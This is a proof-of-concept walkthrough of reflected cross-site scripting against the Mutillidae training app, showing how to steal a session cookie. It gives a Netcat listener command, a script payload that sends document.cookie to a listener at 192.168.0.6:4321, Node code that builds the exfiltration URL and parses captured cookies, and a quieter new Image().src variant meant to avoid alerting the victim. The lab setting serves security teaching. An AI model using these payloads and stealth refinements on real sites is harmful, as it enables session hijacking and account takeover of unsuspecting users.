Simple proof of concept for stealing cookies from a page vulnerable to XSS. Using Mutillidae as the vulnerable application, I’ll perform reflected cross-site scripting against myself and steal my own session cookie.
First, I’ll set up a listener using Netcat:
C:\Tools>nc -nlvp 4321
I’ll navigate to the vulnerable page:
In the input field of the vulnerable page I’ll enter my demo JavaScript, which sends the page’s cookies (document.cookie) to the listener as part of a URL:
<script>document.location='http://192.168.0.6:4321/cgi-bin/grab.cgi?'+document.cookie;</script>
When I click the “Lookup DNS” button, the reflected JavaScript executes in my browser and redirects it to the listener URL; the cookie value arrives at my Netcat listener as the query string of a raw GET request:
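Two practical points are worth keeping in mind with this payload. First, document.cookie only exposes cookies that were set without the HttpOnly flag, so an HttpOnly session cookie will not show up in the listener at all. Second, the post’s payload concatenates document.cookie unencoded, and a redirect is visible to the victim; the helpers below model what the browser actually sends and how to recover the cookie pairs from the raw request Netcat prints. This is an added JavaScript example for Node, not code from the original post; the listener address 192.168.0.6:4321 and the path /cgi-bin/grab.cgi are taken from the post, and the captured request and cookie values are constructed for the example.

```javascript
// Added example (not part of the original post): models both ends of the
// cookie-stealing PoC so the exfiltration can be checked offline.
// Assumed from the post: listener 192.168.0.6:4321 and path /cgi-bin/grab.cgi.
// grab.cgi never needs to exist; Netcat simply prints the raw request.

// The URL the payload makes the victim's browser request. Unlike the post's
// payload, the cookie string is percent-encoded so '=' and ';' inside cookie
// values cannot be confused with query syntax on the receiving side.
function buildExfilUrl(listener, cookieString) {
  return `http://${listener}/cgi-bin/grab.cgi?${encodeURIComponent(cookieString)}`;
}

// Parse what Netcat prints when the redirect lands: an HTTP request whose
// first line is "GET /cgi-bin/grab.cgi?<cookies> HTTP/1.1". Returns the
// cookie name/value pairs, or null if the first line is not a GET request.
function parseCapturedRequest(rawRequest) {
  const requestLine = rawRequest.split(/\r?\n/)[0];
  const match = requestLine.match(/^GET\s+(\S+)\s+HTTP\/\d\.\d$/);
  if (!match) return null;

  // The base origin is a placeholder: only the path and query are used.
  const url = new URL(match[1], 'http://placeholder.invalid');
  const query = url.search.startsWith('?') ? url.search.slice(1) : url.search;

  // document.cookie joins pairs with "; " and the browser encodes the space
  // as %20; a malformed escape (e.g. "%zz") would throw, so fall back to raw.
  let decoded;
  try {
    decoded = decodeURIComponent(query);
  } catch (e) {
    decoded = query;
  }

  const cookies = {};
  for (const pair of decoded.split(';')) {
    const [name, ...rest] = pair.trim().split('=');
    if (name) cookies[name] = rest.join('='); // values may themselves contain '='
  }
  return cookies;
}

// Constructed sample of the request a browser would send for the post's
// payload with two cookies set (cookie names and values are made up).
const SAMPLE_CAPTURE = [
  'GET /cgi-bin/grab.cgi?PHPSESSID=abc123def456;%20showhints=0 HTTP/1.1',
  'Host: 192.168.0.6:4321',
  'Referer: http://192.168.0.6/mutillidae/',
  '',
  '',
].join('\r\n');

console.log(buildExfilUrl('192.168.0.6:4321', 'PHPSESSID=abc123def456; showhints=0'));
console.log(parseCapturedRequest(SAMPLE_CAPTURE));
```

In the browser the encoded variant of the post’s payload would simply use `encodeURIComponent(document.cookie)` in place of the bare `document.cookie`; a quieter variant would load the same URL via `new Image().src` instead of `document.location`, which avoids navigating the victim away from the page.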